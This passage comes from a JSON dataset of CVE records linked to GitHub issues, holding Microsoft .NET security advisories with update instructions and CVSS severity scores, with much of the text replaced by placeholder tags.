Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87551. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  87552. "severity": "MEDIUM",
  87553. "baseScore": 5.5,
  87554. "impactScore": 3.6,
  87555. "exploitabilityScore": 1.8
  87556. },
  87557. {
  87558. "CVE_ID": "CVE-2021-34485",
  87559. "Issue_Url_old": "https://github.com/github/advisory-database/issues/741",
  87560. "Issue_Url_new": "https://github.com/github/advisory-database/issues/741",
  87561. "Repo_new": "github/advisory-database",
  87562. "Issue_Created_At": "2022-10-12T20:44:32Z",
  87563. "description": ".NET CVE backfill round NUMBERTAG Hello, Please find the next batch of .NET CVEs for backfill below. //cc MENTIONTAG MENTIONTAG CVE | Announcement date | CVE URL | Announcement URL | APITAG Advisory | Vulnerable package id | Vulnerable version range | Fixed in version | | | | | | | CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG | APITAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG musl NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm | APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG arm NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG NUMBERTAG CVETAG | PATHTAG | CVETAG | URLTAG | \u00a0 | APITAG NUMBERTAG APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG",
  87564. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  87565. "severity": "MEDIUM",
  87566. "baseScore": 5.5,
  87567. "impactScore": 3.6,
  87568. "exploitabilityScore": 1.8
  87569. },
  87570. {
  87571. "CVE_ID": "CVE-2019-0657",
  87572. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/97",
  87573. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/97",
  87574. "Repo_new": "dotnet/announcements",
  87575. "Issue_Created_At": "2019-02-12T18:21:22Z",
  87576. "description": "Microsoft Security Advisory CVETAG : .NET Core Domain Spoofing Vulnerability. APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core NUMBERTAG and NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a domain spoofing vulnerability in .NET Framework and .NET Core which causes the meaning of a URI to change when International Domain Name encoding is applied. An attacker who successfully exploited the vulnerability could redirect a URI. The security update addresses the vulnerability by disallowing certain Unicode characters from the URI. Discussion Discussion for this issue can be found at URLTAG NUMBERTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET Core NUMBERTAG or NUMBERTAG based application that uses the FILETAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG Any .NET Core NUMBERTAG or NUMBERTAG based application that uses the FILETAG package with a vulnerable version listed below. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG APITAG APITAG Advisory FAQ APITAG APITAG How do I know if I am affected? Applications that use APITAG APITAG is distributed as part of the .NET Core NUMBERTAG runtime. To check the currently installed runtimes, open a command prompt and run the APITAG command. If you have a NUMBERTAG or greater runtime installed, you'll see output like the following; ERRORTAG If your host version is NUMBERTAG and the highest APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. If your host version is NUMBERTAG and the highest NUMBERTAG APITAG runtime version is less than NUMBERTAG you're vulnerable to this issue. You will not see SDK versions if you have only installed the runtime. Applications not using APITAG The affected assembly is also available separately as a APITAG package. If you are not using APITAG you may still be affected if you are referencing the packages listed above. Direct dependencies Direct dependencies are discoverable by examining your csproj file. They can be fixed by editing the project file fixing direct dependencies or using APITAG to update the dependency. Transitive dependencies Transitive dependencies occur when you add a package to your project that in turn relies on another package. For example, if Contoso publishes a package APITAG which, in turn, depends on APITAG and you add the APITAG package to your project now your project has a direct dependency on APITAG and, because APITAG depends APITAG your application gains a transitive dependency on the APITAG package. Transitive dependencies are reviewable in two ways: In the Visual Studio Solution Explorer window, which supports searching. By examining the APITAG file contained in the obj directory of your project for csproj based projects The APITAG files are the authoritative list of all packages used by your project, containing both direct and transitive dependencies. There are two ways to view transitive dependencies. You can either use Visual Studio\u2019s Solution Explorer vs solution explorer , or you can review the APITAG file project assets json) . APITAG APITAG Using Visual Studio Solution Explorer To use Solution Explorer, open the project in Visual Studio, and then press Ctrl+; to activate the search in Solution Explorer. Search for the vulnerable package affected software and make a note of the version numbers of any results you find. For example, searching for APITAG in an example project that contains a package that takes a dependency on APITAG shows the following results in Visual Studio NUMBERTAG FILETAG The search results appear as a tree. In the previous results, you can see that a reference to APITAG version NUMBERTAG is discovered. Under the Dependencies node is a APITAG node. Under the APITAG node is the list of packages you have directly taken a dependency on and their versions. In screenshot, the application takes a direct dependency on APITAG . APITAG in turn has leaf nodes that list its dependencies and their versions. The APITAG package takes a dependency on a version of APITAG , that in turn takes a dependency on a version of APITAG . APITAG APITAG Manually reviewing FILETAG Open the FILETAG file from your project\u2019s obj directory in your editor. We suggest you use an editor that understands JSON and allows you to collapse and expand nodes to review this file. Visual Studio and Visual Studio Code provide JSON friendly editing. Search the FILETAG file for the vulnerable package affected software , using the format APITAG for each of the package names from the preceding table. If you find the assembly name in your search: Examine the line on which they are found, the version number is after the APITAG . Compare to the vulnerable versions table affected software . For example, a search result that shows APITAG is a reference to version NUMBERTAG of APITAG . If your FILETAG file includes references to the vulnerable package affected software , then you need to fix the transitive dependencies. If you have not found any reference to any vulnerable packages, this means either None of your direct dependencies depend on any vulnerable packages, or You have already fixed the problem by updating the direct dependencies. APITAG APITAG How do I fix the issue? Updating the version of APITAG If your host version is a NUMBERTAG host you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . If your host version is a NUMBERTAG you must install version NUMBERTAG or later of the FILETAG , or corresponding FILETAG . APITAG APITAG Fixing direct dependencies Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG elements. The following shows an example project file: CODETAG The preceding example has a reference to the vulnerable package affected software , as seen by the single APITAG element. The name of the package is in the Include attribute. The package version number is in the Version attribute. The previous example shows a single direct dependency on APITAG version NUMBERTAG To update the version to the secure package, change the version number to the updated package version as listed on the table previously affected software . In this example, update APITAG to the appropriate fixed package number affected software for your major version. Save the csproj file. The example csproj now looks as follows: CODETAG If you're using Visual Studio and you save your updated csproj file, Visual Studio will restore the new package version. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the updated dependencies. Now recompile your application. If after recompilation you see a Dependency conflict warning , you must update your other direct dependencies to versions that take a dependency on the updated package. APITAG APITAG Fixing transitive dependencies If your transitive dependency review found references to the vulnerable package affected software , you must add a direct dependency to the updated package to your csproj file to override the transitive dependency. Open APITAG in your editor. If you're using Visual Studio, right click the project and choose Edit APITAG from the context menu, where projectname is the name of your project. Look for APITAG nodes, for example: CODETAG You must add a direct dependency to the updated version of the vulnerable package affected software by adding it to the csproj file. You do this by adding a new line to the dependencies section, referencing the fixed version. For example, if your search showed a transitive reference to a vulnerable APITAG version, you'd add a reference to the fixed package number affected software . CODETAG After you've added the direct dependency reference, save your csproj file. If you're using Visual Studio, save your updated csproj file and Visual Studio will restore the new package versions. You can see the restore results by opening the Output window APITAG and changing the Show output from drop down list to Package Manager . If you're not using Visual Studio, open a command line and change to your project directory. Execute the dotnet restore command to restore the new dependencies. Rebuilding your application Finally, you must rebuild your application, test, and redeploy. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core, please email details to EMAILTAG . Reports may qualify for the .NET Core Bug Bounty. Details of the .NET Core Bug Bounty including terms and conditions are at URLTAG URLTAG . Support You can ask questions about this issue on APITAG in the .NET Core or ASP.NET Core organizations. These are located at URLTAG and URLTAG The Announcements repo for each product ( URLTAG and URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87577. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87578. "severity": "MEDIUM",
  87579. "baseScore": 5.9,
  87580. "impactScore": 3.6,
  87581. "exploitabilityScore": 2.2
  87582. },
  87583. {
  87584. "CVE_ID": "CVE-2021-1721",
  87585. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/175",
  87586. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/175",
  87587. "Repo_new": "dotnet/announcements",
  87588. "Issue_Created_At": "2021-02-09T18:15:20Z",
  87589. "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when creating HTTPS web request during NUMBERTAG certificate chain building. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG application running on .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG or lower, respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87590. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  87591. "severity": "MEDIUM",
  87592. "baseScore": 6.5,
  87593. "impactScore": 3.6,
  87594. "exploitabilityScore": 2.8
  87595. },
  87596. {
  87597. "CVE_ID": "CVE-2021-1721",
  87598. "Issue_Url_old": "https://github.com/dotnet/runtime/issues/48067",
  87599. "Issue_Url_new": "https://github.com/dotnet/runtime/issues/48067",
  87600. "Repo_new": "dotnet/runtime",
  87601. "Issue_Created_At": "2021-02-09T18:30:29Z",
  87602. "description": "Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Denial of Service Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A denial of service vulnerability exists when creating HTTPS web request during NUMBERTAG certificate chain building. Announcement Announcement for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG application running on .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG or lower, respectively. Please note that .NET Core NUMBERTAG is out of support and all applications should be updated to NUMBERTAG APITAG APITAG How do I know if I am affected? If you have a runtime or SDK with a version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please install the latest version of .NET NUMBERTAG NET Core NUMBERTAG or .NET Core NUMBERTAG If you have installed one or more .NET Core SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET Core SDKs. You can list the versions you have installed by running the APITAG command. You should see an output like the following: ERRORTAG If you're using .NET NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG for Visual Studio NUMBERTAG or later) from FILETAG If you're using .NET Core NUMBERTAG you should download and install Runtime NUMBERTAG or SDK NUMBERTAG for Visual Studio NUMBERTAG or NUMBERTAG from FILETAG .NET NUMBERTAG NET Core NUMBERTAG and .NET Core NUMBERTAG updates are also available from Microsoft Update. To access this either type APITAG for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed self contained applications URLTAG targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. Other Information Reporting Security Issues If you have found a potential security issue in .NET Core or .NET NUMBERTAG please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87603. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  87604. "severity": "MEDIUM",
  87605. "baseScore": 6.5,
  87606. "impactScore": 3.6,
  87607. "exploitabilityScore": 2.8
  87608. },
  87609. {
  87610. "CVE_ID": "CVE-2021-41355",
  87611. "Issue_Url_old": "https://github.com/dotnet/runtime/issues/60301",
  87612. "Issue_Url_new": "https://github.com/dotnet/runtime/issues/60301",
  87613. "Repo_new": "dotnet/runtime",
  87614. "Issue_Created_At": "2021-10-12T17:02:13Z",
  87615. "description": "Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability. Microsoft Security Advisory CVETAG | .NET Core Information Disclosure Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A Information Disclosure vulnerability exists in .NET where APITAG may send credentials in plain text on Linux. Announcement Announcement for this issue can be found at URLTAG APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG Affected software Any .NET application that uses APITAG with a vulnerable version listed below on system based on Linux. Package name | Vulnerable versions | Secure versions | | APITAG NUMBERTAG or lower NUMBERTAG APITAG APITAG How do I know if I am affected? If you are using a package version listed in affected software affected software , you're exposed to the vulnerability. APITAG APITAG How do I fix the issue? To fix the issue, please update to the latest version URLTAG of the affected software affected software . Other Information Reporting Security Issues If you have found a potential security issue in .NET, please email details to EMAILTAG . Reports may qualify for the Microsoft .NET Core & .NET NUMBERTAG Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at APITAG . Support You can ask questions about this issue on APITAG in the .NET APITAG organization. The main repos are located at URLTAG and URLTAG The Announcements repo ( URLTAG will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. Disclaimer The information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. External Links CVETAG CVETAG Revisions NUMBERTAG APITAG NUMBERTAG Advisory published. APITAG NUMBERTAG APITAG Updated NUMBERTAG",
  87616. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
  87617. "severity": "MEDIUM",
  87618. "baseScore": 5.7,
  87619. "impactScore": 3.6,
  87620. "exploitabilityScore": 2.1
  87621. },
  87622. {
  87623. "CVE_ID": "CVE-2020-0606",
  87624. "Issue_Url_old": "https://github.com/dotnet/announcements/issues/149",
  87625. "Issue_Url_new": "https://github.com/dotnet/announcements/issues/149",
  87626. "Repo_new": "dotnet/announcements",
  87627. "Issue_Created_At": "2020-01-14T18:01:12Z",
  87628. "description": "Microsoft Security Advisory CVETAG : .NET Core Remote Code Execution Vulnerability. Microsoft Security Advisory CVETAG : .NET Core Remote Code Execution Vulnerability APITAG APITAG Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET Core. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. Microsoft is aware of a remote code execution vulnerability exists in .NET software when the software fails to check the source markup of a file. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the current user. Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of .NET Core. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. The security update addresses the vulnerability by correcting how .NET Core checks the source markup of a file. Discussion Discussion for this issue can be found at URLTAG TBD APITAG APITAG Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. APITAG APITAG 